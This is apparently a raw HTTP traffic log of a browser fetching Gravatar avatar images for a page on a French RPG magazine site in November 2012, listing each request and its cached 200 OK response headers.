GET /avatar/58a1844269317e55bc077db79f3df785?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163133
Content-Length: 3692
GET /avatar/e2b1c769a317a8b43b0f25146e0cc2fb?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e2b1c769a317a8b43b0f25146e0cc2fb?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995582
Content-Length: 5583
GET /avatar/735399da12e14860afa8c183a9765a76?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/735399da12e14860afa8c183a9765a76?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3111444550
Content-Length: 3904
GET /avatar/c16c83844e48f11328fa7e0e49a248cd?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c16c83844e48f11328fa7e0e49a248cd?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163136
Content-Length: 4667
GET /avatar/9d059a932690fc016aaf2d1181a6e4b1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9d059a932690fc016aaf2d1181a6e4b1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 679084699
Content-Length: 3758
GET /avatar/1efd66538e779cbe21de01e9c1127f4f?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1efd66538e779cbe21de01e9c1127f4f?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331431
Content-Length: 4332
GET /avatar/817bf352afbdb36dbf48fa1ec688bd4f?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/817bf352afbdb36dbf48fa1ec688bd4f?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1632826697
Content-Length: 3214
GET /avatar/da203b4d7501ff8e59a46bb389f3ec1e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/da203b4d7501ff8e59a46bb389f3ec1e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1954690408
Content-Length: 3868
GET /avatar/81923f5e8d6db90372824fe599385c65?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/81923f5e8d6db90372824fe599385c65?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817840
Content-Length: 6997
GET /avatar/8e058475392c1bdb3fcddb13c48c40c6?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/8e058475392c1bdb3fcddb13c48c40c6?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448101
Content-Length: 4640
GET /avatar/dbf3dee55a31772073792470ce2f5345?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/dbf3dee55a31772073792470ce2f5345?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163138
Content-Length: 4691
GET /avatar/1e7d5fdd78ade890a677dbc97090222a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1e7d5fdd78ade890a677dbc97090222a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E0)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718181
Content-Length: 5339
GET /avatar/6caa578cbad749b7428516e84e932c5a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6caa578cbad749b7428516e84e932c5a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718182
Content-Length: 5558
GET /avatar/60b89411aaaed6751c1d552c57ddca94?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/60b89411aaaed6751c1d552c57ddca94?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817749
Content-Length: 6996
GET /avatar/bd6c4039cfb7ff9fec892e3333ac37d0?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/bd6c4039cfb7ff9fec892e3333ac37d0?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237443
Content-Length: 5203
GET /avatar/c95b8cd6693a5298546e8cc27ca01f9d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c95b8cd6693a5298546e8cc27ca01f9d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272646
Content-Length: 5372
GET /avatar/617daf200869a2aff378859bfe732def?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/617daf200869a2aff378859bfe732def?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448103
Content-Length: 6758
GET /avatar/ac0f0941ec6ee60a8f226777bff9713a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ac0f0941ec6ee60a8f226777bff9713a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272647
Content-Length: 4448
GET /avatar/3b9529c9268c710560eb3069facbb876?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3b9529c9268c710560eb3069facbb876?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099250
Content-Length: 3796
GET /avatar/d464765b326d9c086d67855b91681392?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d464765b326d9c086d67855b91681392?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718192
Content-Length: 5643
GET /avatar/a46196f4ff8531fd82142ba1bcb0ecf7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a46196f4ff8531fd82142ba1bcb0ecf7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718265
Content-Length: 4010
GET /avatar/d59a370226fdf1381dedf8b80b25c1b1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d59a370226fdf1381dedf8b80b25c1b1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718191
Content-Length: 5507
GET /avatar/247435a95baa1df684dbb2e7a4056693?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/247435a95baa1df684dbb2e7a4056693?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448106
Content-Length: 5019
GET /avatar/19b594d06f7dfdf8fae8944132297f51?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/19b594d06f7dfdf8fae8944132297f51?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817758
Content-Length: 3184
GET /avatar/ba3c553d7737d2a5b327f4dbaef74c90?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ba3c553d7737d2a5b327f4dbaef74c90?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46ED)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099251
Content-Length: 6641
GET /avatar/296c4262700e36a7c98a71d9e985e891?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/296c4262700e36a7c98a71d9e985e891?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FD)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1051573055
Content-Length: 4915
GET /avatar/48834fb7b3f4444b3f960fb3673eb65e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/48834fb7b3f4444b3f960fb3673eb65e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995600
Content-Length: 6652
